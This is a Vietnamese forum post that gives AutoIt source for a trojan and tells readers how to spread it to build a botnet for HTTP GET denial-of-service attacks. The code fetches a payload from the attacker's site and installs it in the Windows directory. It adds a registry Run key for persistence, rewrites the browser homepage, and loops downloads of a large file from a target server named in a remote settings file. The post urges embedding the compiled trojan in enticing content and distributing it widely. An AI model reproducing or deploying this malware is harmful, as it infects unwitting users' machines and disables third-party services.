Chia Sẽ Kinh Nghiệm Về IT



Tìm Kiếm Với Google
-


Gởi Ðề Tài Mới  Gửi trả lời
 
Công Cụ Xếp Bài
Tuổi 20-03-2010, 09:41 AM   #1
hoctinhoc
Guest
 
Trả Lời: n/a
Thực tập DDOS thông qua HTTP GET
Thực tập DDOS thông qua HTTP GET


Source AutoIT 3

http://www.4shared.com/file/55243733...6f/AutoIT.html

Nếu 1 website bảo mật wá , bạn úynh ko đc nó , cũng không đụng đc tới web server của nó thì chúng ta chơi chiêu bài cuối , không ăn được là đạp.

Tấn công từ chối dịch vụ DOS : Denial Of Service . ko chiếm quyền điều khiển mà mục đích là làm cho dich vụ đối phương cung cấp bị tê liệt .

DDOS : Distribute Denial Of Service : Tấn công từ chối dịch vụ phân tán , sử dụng hệ thống mạng botnet để tấn công .

Botnet : Hệ thống các máy tính zombie bị lây nhiễm các trojan , khi nhận lệnh của ta sẽ đồng loạt tấn công .


Sau đây là 1 cách DDOS thông qua HTTP Get , không ghê gớm lắm nhưng cũng làm đc khối tên ói máu nếu mạng botnet của bạn lớn
  • Download và Cài AutoIT
  • Tạo file script sau
  • Compile thành file exe
  • Tạo 1 website của bạn , upload file exe lên với tên trojan.txt
  • Nhúng trojan này vào 1 cái gì đó hấp dẫn và quăng toán loạn

================================================== =====

Trích dẫn:
$website = "http://yourdomain/"
; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\sysinet.exe") Then
InetGet ($website & "/trojan.txt", @WindowsDir & "\sysinet.exe", 0, 1)
Sleep(5000)
EndIf
Đoạn mã trên để download trojan về máy nạn nhân , và rename lại thành file .exe để có khả năng thực thi. [ tại host free ko cho up exe ]

Trích dẫn:
; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\sysinet.exe")
Đoạn trên tạo các giá trị tự động chạy cho trojan sysinet.exe . Disable taskmanager và regedit của đối tượng
Ở đây mình set là 0 vì làm phiền đối tượng nó cáu cài lại máy thì phiền . Mình chỉ mượn tay nó đánh phụ thoy , nên tử tế chút


Trích dẫn:
InetGet ($website & "/setting.txt", @WindowsDir & "\setting.txt", 0, 1)
Sleep(5000)

$taptinmoi = FileOpen(@WindowsDir & "\setting.txt", 0)

$sitetancong = FileReadLine($taptinmoi)
$thoigian = FileReadLine($taptinmoi)

FileClose($taptinmoi)

while(1)

InetGet ($sitetancong, @windowsDir , 0, 1)
sleep($thoigian)
wend
Đoạn này sẽ đọc file settings trên web site của bạn và bắt đầu download dữ liệu từ server về

file setting.txt đặt trên http://yourdomain/
và có nội dụng như sau

dòng 1 : link direct tới file cần download
dòng 2 : thời gian ngủ mỗi lần download
-----------------------------------------------------------------------

ví dụ :
http://abc.com/test.wmv << link direct . file size= 300 mb
300000 << vì file bự , cho ngủ 5 phút .

-----------------------------------------------------------------------
Chỉ cần khoảng vài trăm mạng cùng down bộ phim này thì cái server sẽ ra sao nhỉ

----------------------------------------------------------------------

Bass
----------------------------------------------------------------------
Chúc anh em vọc vui vẻ


  Trả lời ngay kèm theo trích dẫn này
Gửi trả lời


Công Cụ
Xếp Bài

Quyền Hạn Của Bạn
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Mở
Hình Cảm xúc đang Mở
[IMG] đang Mở
Mã HTML đang Tắt




Bây giờ là 03:20 PM. Giờ GMT +7



Diễn đàn tin học QuantriNet
quantrinet.com | quantrimang.co.cc
Founded by Trương Văn Phương | Developed by QuantriNet's members.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.